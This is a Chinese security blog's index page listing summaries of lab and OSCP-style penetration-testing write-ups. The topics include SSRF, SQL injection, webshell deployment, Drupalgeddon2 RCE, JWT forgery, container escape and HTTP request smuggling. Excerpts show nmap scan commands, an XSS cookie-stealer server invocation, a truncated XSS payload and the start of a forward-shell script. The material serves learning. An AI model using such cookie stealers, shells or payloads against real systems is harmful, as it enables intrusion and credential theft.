摘要: ssrf与信息泄露 阅读全文
posted @ 2021-09-17 17:01 wuerror 阅读(62) 评论(0) 推荐(0) 编辑
摘要: sql注入读文件,代码审计出文件名命令注入 阅读全文
posted @ 2021-09-17 09:50 wuerror 阅读(88) 评论(0) 推荐(0) 编辑
摘要: git历史commit泄露密码,tomcat后台部署webshell,ansible playbook执行命令 阅读全文
posted @ 2021-09-11 17:29 wuerror 阅读(30) 评论(0) 推荐(0) 编辑
摘要: 前言 记录一些打靶机过程中修改的脚本。 xss-cookie-stealer python3版本,就是一个服务端,实时输出访问日志(弹回来的cookie) python3 xss-cookie-stealer.py |tee log.txt 原仓库 使用方法 式例如下 <img src=x oner 阅读全文
posted @ 2021-07-11 18:33 wuerror 阅读(14) 评论(0) 推荐(0) 编辑
摘要: oscp考试中涉及到的缓冲区溢出一般流程,与实际练习。 阅读全文
posted @ 2021-07-04 18:07 wuerror 阅读(285) 评论(1) 推荐(1) 编辑
摘要: jwt token伪造,容器逃逸 阅读全文
posted @ 2021-06-27 18:04 wuerror 阅读(122) 评论(0) 推荐(0) 编辑
摘要: druppal geddon2 RCE,snap本地提权 阅读全文
posted @ 2021-06-14 15:38 wuerror 阅读(108) 评论(0) 推荐(0) 编辑
摘要: 信息泄露,wordpress后台getshell, suid提权。PHP/8.1.0-dev后门 阅读全文
posted @ 2021-06-06 16:53 wuerror 阅读(93) 评论(0) 推荐(0) 编辑
摘要: 端口扫描 nmap -sV -v -A ip nmap -sU ip #udp扫描,一般用不着,没思路了可以试试 正向shell Linux python from socket import * import subprocess import os, threading, sys, time i 阅读全文
posted @ 2021-06-05 11:19 wuerror 阅读(45) 评论(0) 推荐(0) 编辑
摘要: ##前言 本来想写成获取参数,启动nmap扫描端口,对所有得到HTTP端口进行测试。后来偷懒写成pocsuite3的插件了。 项目地址 ##原理与攻击面 协议层的攻击——HTTP请求走私 一篇文章带你读懂http请求走私 seebug这篇中提到的几篇blackhat议题建议都看看 ##检测脚本-草稿 阅读全文
posted @ 2021-05-31 16:27 wuerror 阅读(40) 评论(0) 推荐(0) 编辑